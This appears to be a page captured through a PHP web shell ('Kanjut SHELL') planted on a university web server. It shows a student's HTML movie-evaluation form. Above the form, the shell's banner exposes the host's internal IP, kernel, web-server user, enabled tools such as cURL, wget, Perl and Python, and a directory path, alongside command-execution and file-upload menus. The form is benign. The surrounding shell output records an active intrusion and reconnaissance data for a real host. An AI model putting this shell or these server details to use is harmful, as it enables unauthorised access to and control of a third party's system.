Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 18.190.160.6
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/brmorrison/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/brmorrison/public_html/movieEvalForm.html
<!-- movieEvalForm.html -->

<CENTER>
    <h2>Form for Movie Evaluation</h2>
    <hr>
    <Font color=blue size=4>
    <Form action="movieEvalAction.php" method="post">
	Movie Title: <input type="text" size="20" name="title"> 
	<P>

        Genre: <br>
        <input type="radio" name="genre" value="Action"> Action <br>
        <input type="radio" name="genre" value="Comedy"> Comedy <br>
        <input type="radio" name="genre" value="Drama"> Drama <br>
        <input type="radio" name="genre" value="Horror"> Horror <P>

        How would you rate the plot of the movie? <br>
        <input type="radio" name="plot_rating" value="0"> Terrible  <br>
        <input type="radio" name="plot_rating" value="1"> Bad <br>
        <input type="radio" name="plot_rating" value="2"> Poor <br>
	<input type="radio" name="plot_rating" value="3"> Average <br>
	<input type="radio" name="plot_rating" value="4"> Good <br>
	<input type="radio" name="plot_rating" value="5"> Excellent <P>

        How would you rate the acting performances? <br>
        <input type="radio" name="acting_rating" value="0"> Terrible  <br>
        <input type="radio" name="acting_rating" value="1"> Bad <br>    
        <input type="radio" name="acting_rating" value="2"> Poor <br> 
        <input type="radio" name="acting_rating" value="3"> Average <br>
        <input type="radio" name="acting_rating" value="4"> Good <br>
        <input type="radio" name="acting_rating" value="5"> Excellent <P>
        
        How do you rate the overall enjoyment of the movie? <br>
        <input type="radio" name="enjoyment_rating" value="0"> Terrible <br>
        <input type="radio" name="enjoyment_rating" value="1"> Bad <br>
        <input type="radio" name="enjoyment_rating" value="2"> Poor <br>
	<input type="radio" name="enjoyment_rating" value="3"> Average <br>
	<input type="radio" name="enjoyment_rating" value="4"> Good <br>
	<input type="radio" name="enjoyment_rating" value="5"> Excellent <P>

	Would you recommend this movie to a friend? <br>
	<input type="radio" name="overall_recommendation" value="No"> No <br>
	<input type="radio" name="overall_recommendation" value="Yes"> Yes <br>

        <HR>
        <input type="submit" value="Submit">
        <input type="reset" value="Reset">
    </Form>
</CENTER>

<!-- add a link for going back to the movie page -->

<HR>
<A HREF=finalProject.html> Back to Movie Home Page </A> |
<A HREF=index.html> Course Home </A

Stv3n404 - 2023